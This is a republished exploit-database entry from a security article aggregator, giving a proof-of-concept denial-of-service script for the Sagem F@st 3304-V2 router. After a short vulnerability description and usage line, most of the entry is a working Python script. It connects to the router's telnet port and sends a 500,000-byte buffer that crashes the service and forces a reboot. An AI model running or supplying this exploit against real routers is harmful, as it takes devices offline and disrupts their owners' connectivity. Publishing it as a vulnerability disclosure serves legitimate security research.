HackDig : Dig high-quality web security articles for hacker

Sagem F@st 3304-V2 - Telnet Crash PoC

2015-03-12 17:55
# Title              : Sagem F@st 3304-V2 Telnet Crash POC
# Vendor : http://www.sagemcom.com
# Severity : High
# Tested Router : Sagem F@st 3304-V2 (3304-V1, other versions may also be affected)
# Date : 2015-03-08
# Author : Loudiyi Mohamed
# Contact : Loudiyi.2010@gmail.com
# Blog : https://www.linkedin.com/pub/mohamed-loudiyi/86/81b/603
# Vulnerability description:
#==========================
#A Memory Corruption Vulnerability is detected on Sagem F@st 3304-V2 Telnet service. An attacker can crash the router by sending a very long string.
#This exploit connects to Sagem F@st 3304-V2 Telnet (Default port 23) and sends a very long string "X"*500000.
#After the exploit is sent, the telnet service will crash and the router will reboot automatically.

#Usage: python SagemDos.py "IP address"

# Code
#========================================================================
#!/usr/bin/python
import socket
import sys
print("######################################")
print("# DOS Sagem F@st3304 v1-v2 #")
print("# ---------- #")
print("# BY LOUDIYI MOHAMED #")
print("#####################################")
if (len(sys.argv)<2):
print "Usage: %s <host> " % sys.argv[0]
print "Example: %s 192.168.1.1 " % sys.argv[0]
exit(0)
print "nSending evilbuffer..."
s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
try:
s.connect((sys.argv[1], 23))
buffer = "X"*500000
s.send(buffer)
except:
print "Could not connect to Sagem Telnet!"
#========================================================================





Source: 90363/stiolpxe/moc.bd-tiolpxe.www

Read:3361 | Comments:0 | Tags:dos

“Sagem F@st 3304-V2 - Telnet Crash PoC”0 Comments

Submit A Comment

Name:

Email:

Blog :

Verification Code:

Announce

Share high-quality web security related articles with you:)

Tools

Tag Cloud